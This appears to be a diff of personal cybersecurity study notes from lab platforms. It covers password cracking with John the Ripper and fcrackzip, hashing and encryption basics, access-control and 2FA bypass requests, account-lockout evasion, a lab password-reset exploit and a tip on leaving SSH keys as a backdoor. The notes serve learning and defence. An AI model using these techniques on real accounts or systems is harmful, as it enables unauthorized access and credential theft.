If you're cracking hashes in single crack mode, you need to change the file format that you're feeding john for it to understand what data to create a wordlist from. You do this by prepending the hash with the username that the hash belongs to, so according to the above example- we would change the file hashes.txt
**From:** ---> 1efee03cdcb96d90ad48ccc7b8666033
**To**: ---> mike:1efee03cdcb96d90ad48ccc7b8666033
## Custom Cracking Rules
- **What are Custom Rules?**
As we journeyed through our exploration of what John can do in Single Crack Mode- you may have some ideas about what some good mangling patterns would be, or what patterns your passwords often use- that could be replicated with a certain mangling pattern. The good news is you can define your own sets of rules, which John will use to dynamically create passwords. This is especially useful when you know more information about the password structure of whatever your target is.
- **Common Custom Rules**
Many organisations will require a certain level of password complexity to try and combat dictionary attacks, meaning that if you create an account somewhere, go to create a password and enter:
polopassword
You may receive a prompt telling you that passwords have to contain at least one of the following:
- Capital letter
- Number
- Symbol
This is good! However, we can exploit the fact that most users will be predictable in the location of these symbols. For the above criteria, many users will use something like the following:
Polopassword1!
A password with the capital letter first, and a number followed by a symbol at the end. This pattern of the familiar password, appended and prepended by modifiers (such as the capital letter or symbols) is a memorable pattern that people will use, and reuse when they create passwords. This pattern can let us exploit password complexity predictability.
Now this does meet the password complexity requirements, however as an attacker we can exploit the fact we know the likely position of these added elements to create dynamic passwords from our wordlists.
- **How to create Custom Rules**
Custom rules are defined in the `john.conf` file, usually located in `/etc/john/john.conf` if you have installed John using a package manager or built from source with `make` and in `/opt/john/john.conf` on the TryHackMe Attackbox.
Let's go over the syntax of these custom rules, using the example above as our target pattern. Note that there is a massive level of granular control that you can define in these rules, I would suggest taking a look at the wiki [here](https://www.openwall.com/john/doc/RULES.shtml) in order to get a full view of the types of modifier you can use, as well as more examples of rule implementation.
The first line:
```
[List.Rules:THMRules] - Is used to define the name of your rule, this is what you will use to call your custom rule as a John argument.
We then use a regex style pattern match to define where in the word will be modified, again- we will only cover the basic and most common modifiers here:
Az - Takes the word and appends it with the characters you define
A0 - Takes the word and prepends it with the characters you define
c - Capitalises the character positionally
These can be used in combination to define where and what in the word you want to modify.
```
Lastly, we then need to define what characters should be appended, prepended or otherwise included, we do this by adding character sets in square brackets `[ ]` in the order they should be used. These directly follow the modifier patterns inside of double quotes `" "`. Here are some common examples:
```
[0-9] - Will include numbers 0-9
[0] - Will include only the number 0
[A-z] - Will include both upper and lowercase
[A-Z] - Will include only uppercase letters
[a-z] - Will include only lowercase letters
[a] - Will include only a
[!£$%@] - Will include the symbols !£$%@
```
Putting this all together, in order to generate a wordlist from the rules that would match the example password "Polopassword1!" (assuming the word polopassword was in our wordlist) we would create a rule entry that looks like this:
```
[List.Rules:PoloPassword]
cAz"[0-9] [!£$%@]"
In order to:
Capitalise the first  letter - c
Append to the end of the word - Az
A number in the range 0-9 - [0-9]
Followed by a symbol that is one of [!£$%@]
```
- **Using Custom Rules**
We could then call this custom rule as a John argument using the  `--rule=PoloPassword` flag.
As a full command: `john --wordlist=[path to wordlist] --rule=PoloPassword [path to file]`
As a note I find it helpful to talk out the patterns if you're writing a rule- as shown above, the same applies to writing RegEx patterns too.
**All Information** ---> https://www.openwall.com/john/

View file

@ -0,0 +1,21 @@
## What is Fcrackzip?
Fcrackzip is a free and open-source password cracking tool that is used to crack password-protected zip files. It is a command-line tool that uses brute-force and dictionary attacks to recover the password for a given zip file.
Fcrackzip works with a variety of different zip file formats, including ZipCrypto and AES encryption. The tool is highly configurable, allowing users to specify attack methods, character sets, and other parameters.
## Common Uses and Commands
Fcrackzip is primarily used for cracking passwords for zip files. Some common use cases include recovering a lost or forgotten password for a zip file or testing the strength of a password for a zip file.
To use Fcrackzip, users must first download and install the software on their system. Once installed, they can run it from the command line and specify the target zip file and the attack method to be used. Some common command line options for Fcrackzip include:
```Terminal
fcrackzip -u -D -p Wordlists/passwords.txt file.zip
```
## More Information
Fcrackzip is a useful tool for cracking passwords for zip files. It is widely used and respected in the field of password cracking and recovery. The tool is constantly evolving to keep up with new encryption standards and password cracking techniques. Users can find more information and documentation on the tool's official website.
More Information ---> https://www.kali.org/tools/fcrackzip/

View file

@ -0,0 +1,5 @@
## General commands
```Terminal
echo "BASE64CODE" | base64 -d ---> Decode
echo "BASE64CODE" | base64 -w0 ---> Encode
```

View file

@ -0,0 +1,5 @@
## General commands
```
echo TEXT-HERE | shasum -a 256
echo TEXT-HERE | shasum -a 512
```

View file

@ -0,0 +1,35 @@
## Attachment
You can compute the value of the file to conduct file-based reputation checks and further your analysis. As shown below, you can use the sha256sum tool/utility to calculate the file's hash value. 
**Note:** Remember to navigate to the file's location before attempting to calculate the file's hash value.
```shell-session
user@ubuntu$ sha256sum file.something
0827bb9a....
```
![VirusTotal](https://tryhackme-images.s3.amazonaws.com/user-uploads/6131132af49360005df01ae3/room-content/c2c773b4d53b467950632c80649553f7.png)
Once you get the sum of the file, you can go for further analysis using the **VirusTotal**.
- Tool: `https://www.virustotal.com/gui/home/upload`
Now, visit the tool website and use the `SEARCH` option to conduct hash-based file reputation analysis. After receiving the results, you will have multiple sections to discover more about the hash and associated file. Sections are shown below.
![Virustotal sections](https://tryhackme-images.s3.amazonaws.com/user-uploads/6131132af49360005df01ae3/room-content/d71085a61113f7bf87b31dcd0e40570c.png)
- Search the hash value
- Click on the `BEHAVIOR` tab.
- Analyse the details.
After that, continue on reputation check on **InQuest** to enrich the gathered data.
- **Tool:** `https://labs.inquest.net/`
Now visit the tool website and use the `INDICATOR LOOKUP` option to conduct hash-based analysis.
- Search the hash value
- Click on the SHA256 hash value highlighted with yellow to view the detailed report.
- Analyse the file details.
![InQuest](https://tryhackme-images.s3.amazonaws.com/user-uploads/6131132af49360005df01ae3/room-content/f7a0ebef6bbe5b127fe4787a5caf9811.png)

View file

@ -0,0 +1,6 @@
## General commands
```Terminal
mkpasswd -m sha-512 newpasswordhere
```
- -m ENCRYPTION ---> Encryption Type

View file

@ -0,0 +1,8 @@
## General commands
```Terminal
openssl passwd -1 -salt [salt] [password]
```
- -salt ---> Define that the hash contain salt
- `[salt]` ---> salt to include in the hash
- `[password]` ---> Password to encrypt

View file

@ -0,0 +1,157 @@
## Key Terms
- **Ciphertext** - The result of encrypting a plaintext, encrypted data
- **Cipher** - A method of encrypting or decrypting data. Modern ciphers are cryptographic, but there are many non cryptographic ciphers like Caesar.
- **Plaintext** - Data before encryption, often text but not always. Could be a photograph or other file
- **Encryption** - Transforming data into ciphertext, using a cipher.
- **Encoding** - NOT a form of encryption, just a form of data representation like base64. Immediately reversible.
- **Key** - Some information that is needed to correctly decrypt the ciphertext and obtain the plaintext.
- **Asymmetric encryption** - Uses different keys to encrypt and decrypt.
- **Symmetric encryption** - Uses the same key to encrypt and decrypt
- **Cryptanalysis** - Attacking cryptography by finding a weakness in the underlying maths
## Types of Encryption
- **Symmetric encryption**
Uses the same key to encrypt and decrypt the data. Examples of Symmetric encryption are DES (Broken) and AES. These algorithms tend to be faster than asymmetric cryptography, and use smaller keys (128 or 256 bit keys are common for AES, DES keys are 56 bits long).
- **Asymmetric encryption**
Uses a pair of keys, one to encrypt and the other in the pair to decrypt. Examples are RSA and Elliptic Curve Cryptography. Normally these keys are referred to as a **public key and a private key**. Data encrypted with the private key can be decrypted with the public key, and vice versa. Your private key needs to be kept private, hence the name. Asymmetric encryption tends to be slower and uses larger keys, for example RSA typically uses 2048 to 4096 bit keys.
- **Public Key + Private Key = Symmetric encryption**
A combination of both symmetric and asymmetric encryption can be used to provide both security and efficiency. This method involves using asymmetric encryption to securely exchange a symmetric encryption key, which is then used for the actual encryption and decryption of the message. This process is commonly known as a hybrid encryption scheme. The use of symmetric encryption for the actual message encryption provides speed and efficiency, while the asymmetric encryption used for the key exchange provides a secure method of key distribution.
![[Pasted image 20220925173423.png]]
RSA and Elliptic Curve cryptography are based around different mathematically difficult (intractable) problems, which give them their strength. More about RSA later.
## RSA (Rivest Shamir Adleman)
- **The math(s) side**
RSA is based on the mathematically difficult problem of working out the factors of a large number. Its very quick to multiply two prime numbers together, say 17*23 = 391, but its quite difficult to work out what two prime numbers multiply together to make 14351 (113x127 for reference).
- **The attacking side**
The maths behind RSA seems to come up relatively often in CTFs, normally requiring you to calculate variables or break some encryption based on them. The wikipedia page for RSA seems complicated at first, but will give you almost all of the information you need in order to complete challenges.
There are some excellent tools for defeating RSA challenges in CTFs, and my personal favorite is [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) which has worked very well for me. Ive also had some success with [https://github.com/ius/rsatool](https://github.com/ius/rsatool).
The key variables that you need to know about for RSA in CTFs are p, q, m, n, e, d, and c.
“p” and “q” are large prime numbers, “n” is the product of p and q.
The public key is n and e, the private key is n and d.
“m” is used to represent the message (in plaintext) and “c” represents the ciphertext (encrypted text).
- **CTFs involving RSA**
Crypto CTF challenges often present you with a set of these values, and you need to break the encryption and decrypt a message to retrieve the flag.
Theres a lot more maths to RSA, and it gets quite complicated fairly quickly. If you want to learn the maths behind it, I recommend reading MuirlandOracles blog post here: [https://muirlandoracle.co.uk/2020/01/29/rsa-encryption/](https://muirlandoracle.co.uk/2020/01/29/rsa-encryption
## Establishing Keys (Asymmetric Cryptography)
A very common use of asymmetric cryptography is exchanging keys for symmetric encryption. Asymmetric encryption tends to be slower, so for things like HTTPS symmetric encryption is better. But the question is, how do you agree a key with the server without transmitting the key for people snooping to see?
- **Metaphor time**
Imagine you have a secret code, and instructions for how to use the secret code. If you want to send your friend the instructions without anyone else being able to read it, what you could do is ask your friend for a lock.
Only they have the key for this lock, and well assume you have an indestructible box that you can lock with it.
If you send the instructions in a locked box to your friend, they can unlock it once it reaches them and read the instructions.
After that, you can communicate in the secret code without risk of people snooping.
In this metaphor, the secret code represents a symmetric encryption key, the lock represents the servers public key, and the key represents the servers private key.
Youve only used asymmetric cryptography once, so its fast, and you can now communicate privately with symmetric encryption.
- **The Real World**
In reality, you need a little more cryptography to verify the person youre talking to is who they say they are, which is done using digital signatures and certificates. You can find a lot more detail on how HTTPS (one example where you need to exchange keys) really works from this excellent blog post. [https://robertheaton.com/2014/03/27/how-does-https-actually-work/](https://robertheaton.com/2014/03/27/how-does-https-actually-work
## Digital signatures and Certificates
- **What's a Digital Signature?**
Digital signatures are a way to prove the authenticity of files, to prove who created or modified them. Using asymmetric cryptography, you produce a signature with your private key and it can be verified using your public key. As only you should have access to your private key, this proves you signed the file. Digital signatures and physical signatures have the same value in the UK, legally.
The simplest form of digital signature would be encrypting the document with your private key, and then if someone wanted to verify this signature they would decrypt it with your public key and check if the files match.
- **Certificates - Prove who you are!**
Certificates are also a key use of public key cryptography, linked to digital signatures. A common place where theyre used is for HTTPS. How does your web browser know that the server youre talking to is the real tryhackme.com?
The answer is certificates. The web server has a certificate that says it is the real tryhackme.com. The certificates have a chain of trust, starting with a root CA (certificate authority). Root CAs are automatically trusted by your device, OS, or browser from install. Certs below that are trusted because the Root CAs say they trust that organisation. Certificates below that are trusted because the organisation is trusted by the Root CA and so on. There are long chains of trust. Again, this blog post explains this much better than I can. [https://robertheaton.com/2014/03/27/how-does-https-actually-work/](https://robertheaton.com/2014/03/27/how-does-https-actually-work/)
You can get your own HTTPS certificates for domains you own using Lets Encrypt for free. If you run a website, its worth setting it up.
## SSH Authentication
- **Encryption and SSH authentication**
By default, SSH is authenticated using usernames and passwords in the same way that you would log in to the physical machine.
At some point, youre almost certain to hit a machine that has SSH configured with key authentication instead. This uses public and private keys to prove that the client is a valid and authorised user on the server. By default, SSH keys are RSA keys. You can choose which algorithm to generate, and/or add a passphrase to encrypt the SSH key. `ssh-keygen` is the program used to generate pairs of keys most of the time.
- **SSH Private Keys**
You should treat your private SSH keys like passwords. Dont share them, theyre called private keys for a reason. If someone has your private key, they can use it to log in to servers that will accept it unless the key is encrypted.
Its very important to mention that the passphrase to decrypt the key isnt used to identify you to the server at all, all it does is decrypt the SSH key. The passphrase is never transmitted, and never leaves your system.
Using tools like John the Ripper, you can attack an encrypted SSH key to attempt to find the passphrase, which highlights the importance of using a secure passphrase and keeping your private key private.
When generating an SSH key to log in to a remote machine, you should generate the keys on your machine and then copy the public key over as this means the private key never exists on the target machine. For temporary keys generated for access to CTF boxes, this doesn't matter as much.
- **How do I use these keys?**
The ~/.ssh folder is the default place to store these keys for OpenSSH. The `authorized_keys` (note the US English spelling) file in this directory holds public keys that are allowed to access the server if key authentication is enabled. By default on many distros, key authentication is enabled as it is more secure than using a password to authenticate. Normally for the root user, only key authentication is enabled.
In order to use a private SSH key, the permissions must be set up correctly otherwise your SSH client will ignore the file with a warning. Only the owner should be able to read or write to the private key (600 or stricter). `ssh -i keyNameGoesHere user@host` is how you specify a key for the standard Linux OpenSSH client.
- **Using SSH keys to get a better shell**
SSH keys are an excellent way to “upgrade” a reverse shell, assuming the user has login enabled (www-data normally does not, but regular users and root will). Leaving an SSH key in authorized_keys on a box can be a useful backdoor, and you don't need to deal with any of the issues of unstabilised reverse shells like Control-C or lack of tab completion.
## Explaining Diffie Hellman Key Exchange
- **What is Key Exchange?**
Key exchange allows 2 people/parties to establish a set of common cryptographic keys without an observer being able to get these keys. Generally, to establish common symmetric keys.
- **How does Diffie Hellman Key Exchange work?**
Alice and Bob want to talk securely. They want to establish a common key, so they can use symmetric cryptography, but they dont want to use key exchange with asymmetric cryptography. This is where DH Key Exchange comes in.
Alice and Bob both have secrets that they generate, lets call these A and B. They also have some common material thats public, lets call this C.
We need to make some assumptions. Firstly, whenever we combine secrets/material its impossible or very very difficult to separate. Secondly, the order that they're combined in doesnt matter.
Alice and Bob will combine their secrets with the common material, and form AC and BC. They will then send these to each other, and combine that with their secrets to form two identical keys, both ABC. Now they can use this key to communicate.
- **Extra Resources**
An excellent video if you want a visual explanation is available here. [https://www.youtube.com/watch?v=NmM9HA2MQGI](https://www.youtube.com/watch?v=NmM9HA2MQGI)
DH Key Exchange is often used alongside RSA public key cryptography, to prove the identity of the person youre talking to with digital signing. This prevents someone from attacking the connection with a man-in-the-middle attack by pretending to be Bob.
## PGP, GPG and AES
- **What is PGP?**
PGP stands for Pretty Good Privacy. Its a software that implements encryption for encrypting files, performing digital signing and more.
- **What is GPG?**
[GnuPG or GPG](https://gnupg.org/) is an Open Source implementation of PGP from the GNU project. You may need to use GPG to decrypt files in CTFs. With PGP/GPG, private keys can be protected with passphrases in a similar way to SSH private keys. If the key is passphrase protected, you can attempt to crack this passphrase using John The Ripper and gpg2john. The key provided in this task is not protected with a passphrase.
The man page for GPG can be found online [here](https://www.gnupg.org/gph/de/manual/r1023.html).
- **What about AES?**
AES, sometimes called Rijndael after its creators, stands for Advanced Encryption Standard. It was a replacement for DES which had short keys and other cryptographic flaws.
AES and DES both operate on blocks of data (a block is a fixed size series of bits).
AES is complicated to explain, and doesnt seem to come up as often. If youd like to learn how it works, heres an excellent video from Computerphile [https://www.youtube.com/watch?v=O4xNJsjtN6E](https://www.youtube.com/watch?v=O4xNJsjtN6E)

View file

@ -0,0 +1,97 @@
## Key Terms
- **Plaintext** - Data before encryption or hashing, often text but not always as it could be a photograph or other file instead.
- **Encoding** - This is NOT a form of encryption, just a form of data representation like base64 or hexadecimal. Immediately reversible.
- **Hash** - A hash is the output of a hash function. Hashing can also be used as a verb, "to hash", meaning to produce the hash value of some data.
- **Brute force** - Attacking cryptography by trying every different password or every different key
- **Cryptanalysis** - Attacking cryptography by finding a weakness in the underlying maths
## What's a hash function?
Hash functions are quite different from encryption. There is no key, and its meant to be impossible (or very very difficult) to go from the output back to the input.
A hash function takes some input data of any size, and creates a summary or "digest" of that data. The output is a fixed size. Its hard to predict what the output will be for any input and vice versa. Good hashing algorithms will be (relatively) fast to compute, and slow to reverse (Go from output and determine input). Any small change in the input data (even a single bit) should cause a large change in the output.
The output of a hash function is normally raw bytes, which are then encoded. Common encodings for this are base 64 or hexadecimal. Decoding these wont give you anything useful.
- **Why should I care?**
Hashing is used very often in cyber security. When you logged into TryHackMe, that used hashing to verify your password. When you logged into your computer, that also used hashing to verify your password. You interact indirectly with hashing more than you would think, mostly in the context of passwords.
- **What's a hash collision?**
A hash collision is when 2 different inputs give the same output. Hash functions are designed to avoid this as best as they can, especially being able to engineer (create intentionally) a collision. Due to the pigeonhole effect, collisions are not avoidable. The pigeonhole effect is basically, there are a set number of different output values for the hash function, but you can give it any size input. As there are more inputs than outputs, some of the inputs must give the same output. If you have 128 pigeons and 96 pigeonholes, some of the pigeons are going to have to share.
MD5 and SHA1 have been attacked, and made technically insecure due to engineering hash collisions. However, no attack has yet given a collision in both algorithms at the same time so if you use the MD5 hash AND the SHA1 hash to compare, you will see theyre different. The MD5 collision example is available from [https://www.mscs.dal.ca/~selinger/md5collision/](https://www.mscs.dal.ca/~selinger/md5collision/)[](https://www.mscs.dal.ca/~selinger/md5collision/) and details of the SHA1 Collision are available from [https://shattered.io/](https://shattered.io/). Due to these, you shouldn't trust either algorithm for hashing passwords or data.
## What can we do with hashing?
Hashing is used for 2 main purposes in Cyber Security. To verify integrity of data (More on that later), or for verifying passwords.
- **Hashing for password verification**
Most webapps need to verify a user's password at some point. Storing these passwords in plain text would be bad. You've probably seen news stories about companies that have had their database leaked. Knowing some people, they use the same password for everything including their banking, so leaking these would be really really bad.
Quite a few data breaches have leaked plaintext passwords. Youre probably familiar with “rockyou.txt” on Kali as a password wordlist. This came from a company that made widgets for MySpace. They stored their passwords in plaintext and the company had a data breach. The txt file contains over 14 million passwords (although some are *unlikely* to have been user passwords. Sort by length if you want to see what I mean).
Adobe had a notable data breach that was slightly different. The passwords were encrypted, rather than hashed and the encryption that was used was not secure. This meant that the plaintext could be relatively quickly retrieved. If you want to read more about this breach, this post from Sophos is excellent: [https://nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-password-disaster-adobes-giant-sized-cryptographic-blunder/](https://nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-password-disaster-adobes-giant-sized-cryptographic-blunder/)
Linkedin also had a data breach. Linkedin used SHA1 for password verification, which is quite quick to compute using GPUs. 
You can't encrypt the passwords, as the key has to be stored somewhere. If someone gets the key, they can just decrypt the passwords.
This is where hashing comes in. What if, instead of storing the password, you just stored the hash of the password? This means you never have to store the user's password, and if your database was leaked then an attacker would have to crack each password to find out what the password was. That sounds fairly useful.
There's just one problem with this. What if two users have the same password? As a hash function will always turn the same input into the same output, you will store the same password hash for each user. That means if someone cracks that hash, they get into more than one account. It also means that someone can create a "Rainbow table" to break the hashes.
- **Rambo Table**
A rainbow table is a lookup table of hashes to plaintexts, so you can quickly find out what password a user had just from the hash. A rainbow table trades time taken to crack a hash for hard disk space, but they do take time to create.
Here's a quick example so you can try and understand what they're like.
![[Pasted image 20220923163157.png]]
Websites like Crackstation internally use HUGE rainbow tables to provide fast password cracking for hashes without salts. Doing a lookup in a sorted list of hashes is really quite fast, much much faster than trying to crack the hash.
- **Protecting against rainbow tables**
To protect against rainbow tables, we add a salt to the passwords. The salt is randomly generated and stored in the database, unique to each user. In theory, you could use the same salt for all users but that means that duplicate passwords would still have the same hash, and a rainbow table could still be created specific passwords with that salt.
The salt is added to either the start or the end of the password before its hashed, and this means that every user will have a different password hash even if they have the same password. Hash functions like bcrypt and sha512crypt handle this automatically. Salts dont need to be kept private.
## Recognising password hash
Automated hash recognition tools such as [https://pypi.org/project/hashID/](https://pypi.org/project/hashID/) exist, but they are unreliable for many formats. For hashes that have a prefix, the tools are reliable. Use a healthy combination of context and tools.  If you found the hash in a web application database, it's more likely to be md5 than NTLM. Automated hash recognition tools often get these hash types mixed up, which highlights the importance of learning yourself.
Unix style password hashes are very easy to recognise, as they have a prefix. The prefix tells you the hashing algorithm used to generate the hash. The standard format is`$format$rounds$salt$hash`.
Windows passwords are hashed using NTLM, which is a variant of md4. They're visually identical to md4 and md5 hashes, so it's very important to use context to work out the hash type.
On Linux, password hashes are stored in /etc/shadow. This file is normally only readable by root. They used to be stored in /etc/passwd, and were readable by everyone.
On Windows, password hashes are stored in the SAM. Windows tries to prevent normal users from dumping them, but tools like mimikatz exist for this. Importantly, the hashes found there are split into NT hashes and LM hashes.
Here's a quick table of the most Unix style password prefixes that you'll see.
![[Pasted image 20220923201457.png]]
A great place to find more hash formats and password prefixes is the hashcat example page, available here: [https://hashcat.net/wiki/doku.php?id=example_hashes](https://hashcat.net/wiki/doku.php?id=example_hashes).
For other hash types, you'll normally need to go by length, encoding or some research into the application that generated them. Never underestimate the power of research.
## Password craking
We've already mentioned rainbow tables as a method to crack hashes that don't have a salt, but what if there's a salt involved?
You can't "decrypt" password hashes. They're not encrypted. You have to crack the hashes by hashing a large number of different inputs (often rockyou, these are the possible passwords), potentially adding the salt if there is one and comparing it to the target hash. Once it matches, you know what the password was. Tools like Hashcat and John the Ripper are normally used for this.
- Why crack on GPUs?
Graphics cards have thousands of cores. Although they cant do the same sort of work that a CPU can, they are very good at some of the maths involved in hash functions. This means you can use a graphics card to crack most hash types much more quickly. Some hashing algorithms, notably bcrypt, are designed so that hashing on a GPU is about the same speed as hashing on a CPU which helps them resist cracking.
- Cracking on VMs?
Its worth mentioning that virtual machines normally dont have access to the host's graphics card(s) (You can set this up, but its a lot of work). If you want to run hashcat, its best to run it on your host (Windows builds are available on the website, run it from powershell). You can get Hashcat working with OpenCL in a VM, but the speeds will likely be much worse than cracking on your host. John the ripper uses CPU by default and as such, works in a VM out of the box although you may get better speeds running it on the host OS as it will have more threads and no overhead from running in a VM.
**NEVER (I repeat, NEVER!) use --force for hashcat**. It can lead to false positives (wrong passwords being given to you) and false negatives (skips over the correct hash).
UPDATE: As of Kali 2020.2, hashcat 6.0 will run on the CPU without --force. I still recommend cracking on your host OS if you have a GPU, as it will be much much faster..
**All Information** ---> https://github.com/hashcat/hashcat

View file

@ -0,0 +1,2 @@
## What is Steganography
Steganography is the practice of hiding a secret message within a non-secret message, such as an image, audio file, or video. The goal of steganography is to conceal the existence of the hidden message, so that it cannot be detected by anyone who is not the intended recipient. Steganography is often used in combination with encryption to provide an additional layer of security.

View file

@ -0,0 +1,19 @@
## General
The Hash-Identifier tool serves to ascertain the encryption method employed in hashing a password or data. By taking a hash value as its input, it conducts a set of tests to pinpoint the algorithm utilized in generating the hash. Once the algorithm is recognized, the tool aids in discerning the initial plaintext value that underwent hashing.
Haiti enhances the base functionality of the Hash-Identifier tool by incorporating support for identifying hash types compatible with both John the Ripper and Hashcat.
Command (Create via Alias)
```
# Hash-Identifier (Base Tool)
hashid HASHID
hash-identifier HASHID
# Haiti Hash-Identifier (Best Tool)
haiti -e HASHID
```
## More Information
More information ---> https://github.com/blackploit/hash-identifier
More information ---> https://github.com/noraj/haiti

View file

@ -0,0 +1,10 @@
## What is Access Control
Access control (or authorization) is the application of constraints on who (or what) can perform attempted actions or access resources that they have requested. In the context of web applications, access control is dependent on authentication and session management:
- **Authentication** identifies the user and confirms that they are who they say they are. [[1 - What is Authentification Vulnerability]] (All Auth info is in the other folder)
- **Session management** identifies which subsequent HTTP requests are being made by that same user.
- **Access control** determines whether the user is allowed to carry out the action that they are attempting to perform.
Broken access controls are a commonly encountered and often critical security vulnerability. Design and management of access controls is a complex and dynamic problem that applies business, organizational, and legal constraints to a technical implementation. Access control design decisions have to be made by humans, not technology, and the potential for errors is high.

View file

@ -0,0 +1,38 @@
## Vertical Privilege Escalation
- Non-administrative user gaining access to an admin page where they can delete accounts
- Attacker might be able to access administrative functions via the URL
https://insecure-website.com/admin
- Admin URL might be more obscure but still leaked in JavaScript that constructs the user interface:
```
<script>
var isAdmin = false;
if (isAdmin) {
...
var adminPanelTag = document.createElement('a');
adminPanelTag.setAttribute('https://insecure-
website.com/administrator-panel-yb556');
adminPanelTag.innerText = 'Admin panel';
...
}
</script>
```
Parameter-based Access Control Methods- Storing access information in a user-controlled location (hidden field, cookie, query string, etc.)
https://insecure-website.com/login/home.jsp?admin=true
https://insecure-website.com/login/home.jsp?role=1
- Platform Misconfiguration
- Restricting access at the platform layer by specific URLs and HTP methods:
```
DENY: POST, /admin/deleteUser,
managers
```
- Can override by editing the request header
```
POST / HTTP/1.1
X-Original-URL:
/admin/deleteUser
```

View file

@ -0,0 +1,7 @@
## Horizontal Privilege Escalation
- Modify the "id" parameter to access a different account:
https://insecure-website.com/myaccount?id=123
- This attack can be used to go from horizontal to vertical by taking over a privileged account

View file

@ -0,0 +1,8 @@
## How to Prevent Access Control
- Do not rely on obfuscation alone
- Deny access by default
- Use single application-wide mechanism for enforcing access controls
- Make it mandatory for developers to declare access allowed for each resource
- Audit and test access controls to ensure they are working

View file

@ -0,0 +1,4 @@
## What is Authentification Vulnerability
Authentication is the process of verifying the identity of a given user or client. In other words, it involves making sure that they really are who they claim to be. At least in part, websites are exposed to anyone who is connected to the internet by design.

View file

@ -0,0 +1,56 @@
## Multi-Factor Authentication
Two-Factor Authentication Tokens
- Some websites send a verification code via a dedicated device or app (such as Google Authenticator)
- Other websites send a code via text message which is open to abuse
Code is being transmitted via SMS rather than by the device itself
Code can be intercepted via SIM swapping among other means
Bypassing Two-Factor Authentication
- Try to go to "logged in pages" without entering the code -- you might be able to bypass MFA completely Flawed Two-Factor Verification Logic
1. User logs in with normal creds
```
POST /login-steps/first
HTTP/1.1
Host: vulnerable-website.com
...
username=carlos&password=qwerty
```
2. User is assigned a cookie that relates to their account, before being taken to the second step of the login process
```
HTTP/1.1 200 OK
Set-Cookie: account=carlos
GET /login-steps/second
HTTP/1.1
Cookie: account=carlos
```
3. When submitting the verification code, the request uses this cookie to determine which account the user is trying to access
```
POST /login-steps/second
HTTP/1.1
Host: vulnerable-
website.com
Cookie: account=carlos
...
verification-code=123456
```
4. You can change the "account" cookie to any username when submitting the code
```
POST /login-steps/second
HTTP/1.1
Host: vulnerable-
website.com
Cookie: account=victim-user
...
verification-code=123456
```
Brute-forcing 2FA Verification Codes
- This can be automated by creating macros for Burp Intruder
- This can also be done with the Turbo Intruder extension

View file

@ -0,0 +1,25 @@
## Password-Based Login
Username/Password Enumeration
- Pay attention to the following:
Status Codes
Error Messages
Response Times
Bypassing Brute-Force Protections:
- Protection #1: Account lockout based on invalid login attempts
- Protection #2: Blocking IP based on many login attempts in quick succession
Both can be bypassed by adding valid login with your own credentials every few tries so there is not a succession of invalid login attempts
Bypassing Account Locking:
- Establish a list of candidate usernames that are likely to be valid. This could be through username enumeration or simply based on a list of common usernames.
- Decide on a very small shortlist of passwords that you think at least one user is likely to have. Crucially, the number of passwords you select must not exceed the number of login attempts allowed. For example, if you have worked out that limit is 3 attempts, you need to pick a maximum of 3 password guesses.
- Using a tool such as Burp Intruder, try each of the selected passwords with each of the candidate usernames. This way, you can attempt to brute-force every account without triggering the account lock. You only need a single user to use one of the three passwords in order to compromise an account.
HTTP Basic Authentication
- Old but simple so sometimes is still in use
- Sends the username:password after Base64 encoding it in the "Authorization" header of every response
- Can be compromised with a man-in-the-middle attack
- Often do not support brute-force protection
- Partially vulnerable to session-related exploits such as CSRF

View file

@ -0,0 +1,30 @@
## Resetting User Passwords
Some apps send password by email
- Sending clear text of the user's password should not be possible if password is stored securely
- Sending passwords over insecure channels can be exploited via a man in the middle attack
- Many users sync their emails across multiple devices increasing the attack surface
Resetting Passwords via URL
- Less secure ways use a URL with an easily guessable parameter: http://vulnerable-website.com/reset-password?user=victim-user
- Better practice is to generate a high-entropy, hard to guess token and create the URL based on that http://vulnerable-website.com/reset-passwordtoken=a0ba0d1cb3b63d13822572fcff1a241895d893f659164d4cc550b421ebdd48a8
§ Some websites still fail to validate the token so an attacker can visit the
§ Some website also generate token via time base or via order... This mean you can try to guest the token value. (Ex: reset your own password and the very next second reset the victim password. If your reset link is ex: .com/reset/54349878/, the reset link of your victim could be .com/reset/54349879)
- exploitation example
- Exploit Steps
1. With Burp running, click the Forgot your password? link and enter your own username.
2. Click the Email client button to view the password reset email that was sent. Click the link in the email and resetyour password to whatever you want.
3. In Burp, go to Proxy > HTTP history and study the requests and responses for the password reset functionality. Observe that the reset token is provided as a URL query parameter in the reset email. Notice that when you submit your new password, the POST /forgot-password?temp-forgot-password-token request contains the username as hidden input. Send this request to Burp Repeater.
4. In Burp Repeater, observe that the password reset functionality still works even if you delete the value of the temp-forgot-password-token parameter in both the URL and request body. This confirms that the token is not being checked when you submit the new password.
5. In the browser, request a new password reset and change your password again. Send the POST /forgot-password?temp-forgot-password-token request to Burp Repeater again.
6. In Burp Repeater, delete the value of the temp-forgot-password-token parameter in both the URL and request body. Change the username parameter to carlos. Set the new password to whatever you want and send the request.
7. In the browser, log in to Carlos's account using the new password you just set. Click My account to solve the lab.

View file

@ -0,0 +1,6 @@
Restricted files that are not allow to be view by some users
- Possible to view some content by using some feature that has not be sanatized
- ex: page/2 ---> Restricted
- page/edit/2 ---> Not restricted (or possibility to view content)

View file

@ -0,0 +1,27 @@
## Secure Authentication Mechanisms
- Take Care with User Credentials
Never send login data over unencrypted connections
Redirect HTTP requests to HTTPS
Audit website to make sure no username or emails are disclosed through HTTP responses
- Don't Count on Users for Security
Implement an effective password policy
Provide real-time feedback on user's password strength
- Prevent Username Enumeration
Use identical/generic error messages on all authentication pages
Return the same HTTP status code with each login request
Make response times indistinguishable
- Implement Robust Brute-Force Protection
Implement strict, IP-based user rate limiting
Require a user to complete a CAPTCHA test with every login attempt after a limit is reached
- Check Verification Logic
Audit all verification and validation logic to eliminate flaws
- Implement Proper MFA
Use a device or app that generates the code directly (not SMS or email)
Make sure MFA logic is sound

View file

@ -0,0 +1,22 @@
## What is Information Disclosure
**Information** **disclosure**, also known as **information** leakage, is when a website unintentionally reveals sensitive **information** to its users. Depending on the context, websites may leak all kinds of **information** to a potential attacker, including: Data about other users, such as usernames or financial **information** Sensitive commercial or business data
![[Screenshot from 2022-12-02 13-22-14.png]]
Type of Data that can be leaked:
- Data about other users (usernames or financial data)
- Sensitive commercial or business data
- Technical details about the website or infrastructure
Example of information disclosure:
